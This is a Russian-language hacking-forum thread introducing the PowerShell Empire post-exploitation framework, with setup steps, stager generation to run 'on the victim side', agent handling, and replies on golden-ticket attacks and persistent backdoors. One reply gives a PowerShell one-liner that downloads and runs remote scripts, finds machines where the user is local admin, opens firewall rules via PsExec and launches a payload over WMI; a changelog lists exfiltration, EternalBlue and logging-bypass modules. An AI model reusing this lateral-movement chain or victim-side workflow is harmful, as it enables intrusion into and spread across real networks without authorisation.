Статья Знакомство с PowerShell Empire Framework

И так привет колеги. Сегодня я хотел бы немного Вас ознакомить с прекрасным ,по моему скромному мнению, продуктом PowerShell Empire Framework.

PowerShell Empire Framework - это агент для пост эксплуатации windows систем,написанный полностью на павершеле (серверная часть на питона а клиентская на павершеле,по этому легко поднять серверную часть на том же Kali Linux) и имеет в себе огромный функционал. Как я заметил что помимо того , что он используется для пост эксплуатации ( повышение привилегий, закрепленния в системе) он активно так очень используется и для активного фишинга,обхода антивируса и эксплуатации уязвимостей и одна из главных фишок - отлично используется для атак на Домен Контролеры. Конечно я все это хочу вам рассказать))) но сегодня мы слегка ознакомимся с интерфейсом фреймворка и базовы самые моменты)

Вобщем поехали)
Первым делом качаем:

git clone https://github.com/adaptivethreat/Empire.git

Запускаем

Смотрим help

Как и в любой клиент серверной программе сначала нам предстоит настроить listener(наш ip адрес и порт на котором мы будем встречать соединение с удаленной windows системы)
Идем в listener и смотрим командой options перечень параметров которые нам доступны для изменения:

Командой set Name можем задать имя нашему листенеру,аналогично можем указать порт и ip адрес.
Далее посмотрим какие есть векторы експлуатации клиенской части (stagers)
командой usestager и двойным нажатием клавиши tab

Как видите тут довольно таки большой выбор.Есть как dll injection,hta,Rubber Ducker,макросы и т.д.
Ну для ознакомления мы используем стейжер launcher - который создаст нам однострочную команду для powerhsell которую нужно будет запустить на стороне жертвы.

Вводим команды

usestager launcher
set Listener DarkNode
execute

Надеюсь понятно что usestager launcher - говорим какой стейжер будет юзать.
set Listener указываем на каком листенере будем встречать коннект.
execute - сгенерировать команду
На вывод получаем нашу команду:

Дальше запускаем эту команду на стороне жертвы и ловим соединение (В отличии от метасплоита там сессии называют в большинстве случаев метерпретер сессии ,а в импери (Empire) агентами)
И вот к нам прилетает агент)

Командой list agents - посмотреть список агентов
rename - можно переименовать имя агента(так по дефолту оно рандомное) - это не обизательно,больше для удобства просто.
interact - мигрировать в сессию агента (аналогично как session -i в метасплоите)

Дальше у нас открывается очень много функционала,изучаем команду help:

И еще перечень модулей можно посмотреть командой
usemodule "и нажать клавишу таб [tab]"

Так для примера возьмем модуль тролинга и выведем сообщение об ошибке с нужным нам текстом на стороне жертвы

Установка Powershell Empire на Кали Линукс

Всем спасибо)) Продолжения следует) Хех)

 

[Inject0r]

Супер! Интересно про атаку на DC с помощью этой утилиты почитать)

 

[<~DarkNode~>]

Ну у меня железа нету что бы с эмулировать нормально.
Как вариант под большой хайд могу запилить прохождения таска на рутми.
Так как раз наглядно демонстрируется атаки на АктивДиректори и домен контролер через голден тикет.

Вот таск

Ссылка скрыта от гостей

Просто его прошли всего 68 человек из 39тыс. учасников. Сливать решение буду под хайд гдето в 70 сообщений только)

 

[useralexrc]

Сделал все кроме макроса через свой VPS, работает. Ночью сделаю макрос и продолжу)

 

[useralexrc]

(Empire: listeners) > execute
[!] Error starting listener on port 8080: [Errno 98] Address already in use
[!] Error starting listener on port 8080, port likely already in use.
В чем может быть причина?

 

[useralexrc]

Уже разобрался, спасибо за статью)

 

[Mr.Gor]

Ну у меня железа нету что бы с эмулировать нормально.
Как вариант под большой хайд могу запилить прохождения таска на рутми.
Так как раз наглядно демонстрируется атаки на АктивДиректори и домен контролер через голден тикет.

Вот таск

Ссылка скрыта от гостей

Просто его прошли всего 68 человек из 39тыс. учасников. Сливать решение буду под хайд гдето в 70 сообщений только)

Спасибо за статью!
Заинтересовал таском BlueBox Pentest. Буду ждать статейку.

 

[<~DarkNode~>]

Уже разобрался, спасибо за статью)

Два раза команду execute наверное выполнил)
И он поругался на то что порт занят уже)
Можно создавать много листенеров просто нужно указывать им разные порты командой set Port
И разные имена им давать.

Так же можно выбрать тип листенера командой set Type (по умолчанию native) и к примеру создать листенер для метасплоиа и легко мигрировать с империи в метасплоит если нужно выполнить там какойто модуль или какой то функционал.
Если нужно подробнее о миграции в метасплоит - я могу написать пост как это делать.Там все easy(легко).

 

[klentod]

спасибо все получилось) жду продолжения

 

[kot-gor]

Все ждем!!!

 

[viktorcruce]

Ну у меня железа нету что бы с эмулировать нормально.
Как вариант под большой хайд могу запилить прохождения таска на рутми.
Так как раз наглядно демонстрируется атаки на АктивДиректори и домен контролер через голден тикет.

Вот таск

Ссылка скрыта от гостей

Просто его прошли всего 68 человек из 39тыс. учасников. Сливать решение буду под хайд гдето в 70 сообщений только)

если не трудно бро то можно в пм саму технику. я видел как автор нишанга делал эту атаку незнаю насколько она сейчас актуальна)

Собрал для своих нужд вот такой комбаин...

[HIDE="35"]IEX (New-Object Net.WebClient).DownloadString(' link removed IEX (New-Object Net.WebClient).DownloadString(' link removed Invoke-FindLocalAdminAccess -Threads 40 | foreach { "Name : "+$_;Invoke-PsExec -Command 'netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes' -ComputerName $_ ; Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "your payload" -Computername $_ }

 

[Dmitry88]

Сегодня протестировал связку fuzzbunch и Empire. Господа, это шикарно. В доменной сети закидывает через smb необходимую dll и позволяет создать довольно живучий бекдор.
ПС: Вопрос к модераторам, я так понимаю копипаста, даже со своими скриншотами не приветствуется на ресурсе ? Просто думал мини-статейку накатать по этой связке. Или ограничиться ссылкой на исходнуюю статью?

 

[<~DarkNode~>]

Сегодня протестировал связку fuzzbunch и Empire. Господа, это шикарно. В доменной сети закидывает через smb необходимую dll и позволяет создать довольно живучий бекдор.
ПС: Вопрос к модераторам, я так понимаю копипаста, даже со своими скриншотами не приветствуется на ресурсе ? Просто думал мини-статейку накатать по этой связке. Или ограничиться ссылкой на исходнуюю статью?

Я приветствую, если указан источник на ресурс.

 

[hdmoor]

Моё почтение ~~DarkNode~~ ! С выходом релиза 2.0 испытываю серьёзные проблемы с синтаксисом, команда info не работает. Вы наверняка точно знаете где надо посмотреть и увидеть изменения в синтаксисе команд. Буду очень признателен если дадите такую информацию.

 

[<~DarkNode~>]

Моё почтение ~~DarkNode~~ ! С выходом релиза 2.0 испытываю серьёзные проблемы с синтаксисом, команда info не работает. Вы наверняка точно знаете где надо посмотреть и увидеть изменения в синтаксисе команд. Буду очень признателен если дадите такую информацию.

Сделай скриншот проблемы,попытаюсь помочь.

 

[hdmoor]

Раньше было listeners и командой set можно было посмотреть нагрузки, теперь не так,
В этой связи вопрос:
Какая команда нужна что бы выбрать stager для создания dll
sat - не работает, какя команда ознакомит с возможностями стейджера?

эти изменения разрабы где ни будь обозначили? где? можно на них посмотреть? (я искал уверяю но не нашёл)
[doublepost=1495287827,1495271875][/doublepost]У неё веб-морда есть, годная нет? https://github.com/interference-security/empire-web

 

[Ondrik8]

Посмотреть вложение 10156

Раньше было listeners и командой set можно было посмотреть нагрузки, теперь не так,
В этой связи вопрос:
Какая команда нужна что бы выбрать stager для создания dll
sat - не работает, какя команда ознакомит с возможностями стейджера?

эти изменения разрабы где ни будь обозначили? где? можно на них посмотреть? (я искал уверяю но не нашёл)
[doublepost=1495287827,1495271875][/doublepost]У неё веб-морда есть, годная нет? https://github.com/interference-security/empire-web

Командой set нужно менять параметр стажер или листенер

смотри внемательно!! у меня все получилось он работает только не пытайся параметр http в листенере поменять!

 

[hdmoor]

Ок,
Ondrik8
Спасибо друже!

 

[Dmitry88]

У неё веб-морда есть, годная нет? https://github.com/interference-security/empire-web

Ту что Вы указали есть:
https://codeby.net/threads/powershell-empire-chast-3-web-gui.59614/
Не идеальная , но в целом юзабельно.

 

[Ondrik8]

Сегодня вышла обнова! и там много вкусного!)))

-Add get schwifty trollsploit module @424f424f
-Add -sta flag to launcher @xorrior
-Fixed hardoced cert path @xorrior
-Fix for #567
-Merge Capture OSX credentials from Prompt Module in Empire DB @malcomvetter.
-Rest Api fixups #526 @byt3bl33d3r
-Added MS16-135 exploit module @ThePirateWhoSmellsOfSunflowers
-Updated Bloodhound Ingestion module @rvrsh3ll
-Added Dropbox exfil module @ktevora1
-Added EternalBlue module @ktevora1
-Fix SSL certificate issue with Flask @diskonnect
-Modify staging to handle unicode characters @killswitch-GUI
-Add wmi_updater module #509 @tristandostaler
-Add DropBox exfil module #557 @e0x70i
-Fix Unexpected error: <class 'struct.error'> run empire #567
-Fix SSL Intermediate Certificates to support Domain Fronting #569 @dchrastil
-Add ‘SandboxMode’ to evade Apple Sandbox protection on applescript #578 @dchrastil
-Add Obfuscated Empire #597 @cobbr
-Add Bypass ScriptBlock Logging #603 @cobbr
-Add mimipenguin module @rvrsh3ll
-Add dyld_print_to_file Mac privesc @checkyfuntime
-Added manual proxy specifications @xorrior
-Fix libssl-dev and libssl1.0.0 packages @xorrior
-Add backgrounding for downloads in PowerShell agent @xorrior
-Fix warning patch in http listener @viss
-Update Invoke-Kerberoast @424f424f
-Tab complete shows elevated modules: #599
- Additional bypassUAC modules added: #596
- Added show uac level module #609
- Fixed shebangs: #640